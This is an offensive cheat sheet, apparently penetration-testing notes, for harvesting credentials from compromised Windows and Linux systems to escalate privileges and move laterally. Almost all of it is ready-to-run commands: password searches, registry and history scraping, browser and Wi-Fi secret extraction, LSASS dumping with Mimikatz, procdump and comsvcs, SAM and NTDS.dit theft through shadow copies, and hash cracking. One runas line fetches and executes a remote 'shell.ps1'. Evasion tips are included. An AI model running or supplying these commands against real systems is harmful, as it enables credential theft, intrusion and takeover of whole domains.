Credential Hunting

Search for and extract credentials from compromised Windows and Linux systems to escalate privileges and move laterally.
This phase follows privilege escalation and focuses on discovering stored passwords, hashes, keys, and tokens for further access.

Windows Credential Hunting

Quick Wins

Search for Password Keywords

# Search file contents for passwords
Get-ChildItem -Path C:\ -Recurse -File -Include *.txt,*.xml,*.config,*.ini,*.json,*.yaml,*.yml -ErrorAction SilentlyContinue -Force | Select-String -Pattern "password|pass|passwd|pwd" -ErrorAction SilentlyContinue | Select-Object Path, LineNumber

# Search for specific keyword
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue -Force | Select-String -Pattern "password" -ErrorAction SilentlyContinue | Select-Object Path, LineNumber, Line

# Search in filenames
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Force | Where-Object { $_.Name -like "*password*" }

CMD Search Commands

# Search file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul
findstr /spin "password" *.*

# Search for specific filenames
dir /S /B *pass*.txt *pass*.xml *pass*.ini *cred* *vnc* *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Registry Credential Hunting

Autologon Credentials

# Check for autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Search Registry for Passwords

# Search for password keys
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

# Common credential locations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

PuTTY Saved Sessions

# List PuTTY sessions
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

# Query specific session for credentials
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<session_name>

PowerShell History

Get History File Location

(Get-PSReadLineOption).HistorySavePath

Read PowerShell History

# Current user
gc (Get-PSReadLineOption).HistorySavePath

# All users
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Saved Credentials

cmdkey - List Saved Credentials

# List stored credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:DOMAIN\admin cmd.exe
runas /savecred /user:DOMAIN\admin "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')"

Windows Credential Manager

View Credential Manager

# Open Credential Manager GUI
rundll32 keymgr.dll,KRShowKeyMg

# List credentials
cmdkey /list

Dump Credentials with Mimikatz

mimikatz.exe
privilege::debug
sekurlsa::credman

Application Credentials

LaZagne - Extract All Credentials

# Run all modules
.\lazagne.exe all

# Specific modules
.\lazagne.exe browsers
.\lazagne.exe wifi
.\lazagne.exe databases

SessionGopher - Extract Saved Sessions

# Import module
Import-Module .\SessionGopher.ps1

# Run locally
Invoke-SessionGopher

# Run against remote target
Invoke-SessionGopher -Target COMPUTER01

SharpChrome - Extract Chrome Credentials

# Extract saved logins
.\SharpChrome.exe logins /unprotect

# Extract cookies
.\SharpChrome.exe cookies

Unattended Installation Files

# Search for unattend.xml files
Get-ChildItem -Path C:\ -Recurse -Include *unattend*.xml -ErrorAction SilentlyContinue

# Common locations
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\Unattend.xml

Sticky Notes

# Sticky Notes database location
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

# Query with PSSQLite
Import-Module .\PSSQLite.psd1
$db = 'C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

# Extract with strings
strings plum.sqlite-wal | grep -i password

KeePass Databases

# Find KeePass databases
Get-ChildItem -Path C:\ -Recurse -Include *.kdbx -ErrorAction SilentlyContinue

# Extract hash
python2.7 keepass2john.py database.kdbx > keepass_hash.txt

# Crack hash
hashcat -m 13400 keepass_hash.txt rockyou.txt
john --wordlist=rockyou.txt keepass_hash.txt

WiFi Passwords

# List saved WiFi networks
netsh wlan show profile

# Extract WiFi password
netsh wlan show profile <SSID> key=clear

Installed Applications

# List installed applications
dir "C:\Program Files"
dir "C:\Program Files (x86)"

# PowerShell method
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Chrome Dictionary Files

# Check Chrome custom dictionary
gc 'C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt'

PowerShell Encrypted Credentials

# If you find encrypted credential files
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

Snaffler - Network Share Hunting

# Search network shares for sensitive files
.\Snaffler.exe -s -o snaffler.log

# Search specific share
.\Snaffler.exe -s -d DOMAIN -c <DC> -o results.log

Linux Credential Hunting

Quick Wins

Search for Passwords in Files

# Search for password patterns
grep -R --line-number -i "pass\|pwd\|secret\|token" /etc /home 2>/dev/null

# Search in config files
find / -type f -name "*.conf" -exec grep -H "pass" {} \; 2>/dev/null
find / -type f -name "*.config" -exec grep -H "pass" {} \; 2>/dev/null

# Search in scripts
find / -type f -name "*.sh" -exec grep -H "pass" {} \; 2>/dev/null

# Search for backup files
find / -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" \) 2>/dev/null

History Files

# Find history files
find / -type f \( -name "*_history" -o -name ".bash_history" -o -name ".zsh_history" \) 2>/dev/null

# Read history files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.python_history
cat ~/.php_history

SSH Keys

# Find SSH private keys
find / -name "id_rsa" -o -name "id_dsa" -o -name "*.pem" 2>/dev/null

# Check permissions
ls -la ~/.ssh/
ls -la /home/*/.ssh/
ls -la /root/.ssh/

# Find authorized_keys
find / -name "authorized_keys" 2>/dev/null

Database Credentials

# Common database config locations
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat /etc/mysql/my.cnf
cat ~/.my.cnf
cat ~/.pgpass

Environment Variables

# Check environment for secrets
env | sort
printenv
cat /proc/*/environ 2>/dev/null | tr '\0' '\n'

Configuration Files

# Search common config locations
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers
cat /etc/ssh/sshd_config

# Application configs
find /etc -type f -name "*.conf" 2>/dev/null
find /opt -type f -name "*.conf" 2>/dev/null

Log Files

# Search logs for credentials
grep -r "password" /var/log 2>/dev/null
grep -r "pass" /var/log 2>/dev/null

# Check auth logs
cat /var/log/auth.log
cat /var/log/secure

Web Application Files

# Search web directories
find /var/www -type f -name "*.php" -exec grep -H "password" {} \; 2>/dev/null
find /var/www -type f -name "*.config" -exec grep -H "password" {} \; 2>/dev/null

# Common web app configs
cat /var/www/html/wp-config.php
cat /var/www/html/configuration.php
cat /var/www/html/config.inc.php

Backup Files

# Find backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" 2>/dev/null

# Check backup directories
ls -la /var/backups/
ls -la /tmp/
ls -la /opt/backups/

Memory Dumps

# Check for core dumps
find / -name "core" -o -name "*.core" 2>/dev/null

# Strings on memory dumps
strings /path/to/core | grep -i password

LSASS Dumping (Windows)

Task Manager Method

1. Open Task Manager
2. Find "Local Security Authority Process"
3. Right-click -> Create dump file
4. Copy dump file to attacker machine

ProcDump

# Dump LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Transfer and parse with Mimikatz
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Mimikatz Direct

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Rundll32 Method

# Create dump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass_pid> C:\temp\lsass.dmp full

# Find LSASS PID
tasklist /fi "imagename eq lsass.exe"

SAM/SYSTEM Dumping (Windows)

Registry Method

# Save registry hives
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY

# Extract hashes offline
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Volume Shadow Copy

# Create shadow copy
wmic shadowcopy call create Volume='C:\'

# List shadow copies
vssadmin list shadows

# Copy SAM/SYSTEM from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM

NTDS.dit Dumping (Domain Controller)

NTDSUtil Method

# Create IFM backup
ntdsutil "ac i ntds" "ifm" "create full C:\temp\ntds" q q

# Extract hashes
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Volume Shadow Copy Method

# Create shadow copy
vssadmin create shadow /for=C:

# Copy NTDS.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\temp\SYSTEM

CrackMapExec

crackmapexec smb 10.10.10.10 -u administrator -p password --ntds

Notes

Windows Credential Locations:

• Registry (Autologon, PuTTY, VNC)
• PowerShell history
• Credential Manager
• Application configs (browsers, email, FTP)
• Unattended installation files
• Sticky Notes database
• KeePass databases
• WiFi profiles

Linux Credential Locations:

• History files (.bash_history, .mysql_history)
• SSH keys (id_rsa, authorized_keys)
• Configuration files (/etc, /opt, /var/www)
• Environment variables
• Database configs
• Log files
• Backup files

DPAPI (Data Protection API):

• Windows uses DPAPI to encrypt credentials
• Credentials can only be decrypted by same user on same machine
• Mimikatz can abuse DPAPI with appropriate privileges
• SharpDPAPI and DonPAPI are alternative tools

LSASS Dumping:

• Requires local admin or SYSTEM privileges
• Highly monitored by EDR/AV
• Multiple methods available (procdump, task manager, rundll32)
• Parse dumps offline with Mimikatz

SAM/SYSTEM Hives:

• Contain local user password hashes
• Locked while system is running
• Can be copied from Volume Shadow Copies
• Extract hashes with secretsdump.py or Mimikatz

NTDS.dit:

• Active Directory database on Domain Controllers
• Contains all domain user hashes
• Requires Domain Admin or DC compromise
• Extract with ntdsutil, VSS, or CrackMapExec

Detection Considerations:

• LSASS access triggers alerts
• Registry queries may be logged
• File searches generate noise
• Use living-off-the-land techniques when possible
• Credential Manager access generates event 4983, 4688, 16385

Best Practices:

• Always check PowerShell history first
• Search for unattended.xml files
• Check for saved credentials (cmdkey)
• Look for KeePass databases
• Search network shares with Snaffler
• Check application-specific credential stores
• Don’t forget WiFi passwords
• Review Sticky Notes for passwords